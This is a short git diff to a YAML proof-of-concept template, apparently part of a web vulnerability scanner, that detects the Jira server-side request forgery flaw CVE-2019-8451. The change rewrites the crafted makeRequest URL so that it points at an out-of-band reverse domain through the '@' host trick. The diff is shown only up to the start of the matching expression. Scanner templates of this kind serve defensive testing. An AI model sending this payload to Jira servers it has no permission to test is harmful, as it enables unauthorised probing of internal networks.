diff --git a/WebScan/pocs/jira-ssrf-cve-2019-8451.yml b/WebScan/pocs/jira-ssrf-cve-2019-8451.yml index 12c75ce..4e873ad 100644 --- a/WebScan/pocs/jira-ssrf-cve-2019-8451.yml +++ b/WebScan/pocs/jira-ssrf-cve-2019-8451.yml @@ -3,12 +3,11 @@ set: reverse: newReverse() originScheme: request.url.scheme originHost: request.url.host - reverseHost: reverse.url.host - reverseURL: reverse.url.path + reverseURL: reverse.domain rules: - method: GET path: >- - /plugins/servlet/gadgets/makeRequest?url={{originScheme}}://{{originHost}}@{{reverseHost}}{{reverseURL}} + /plugins/servlet/gadgets/makeRequest?url={{originScheme}}://{{originHost}}@{{reverseURL}} headers: X-Atlassian-Token: no-check expression: |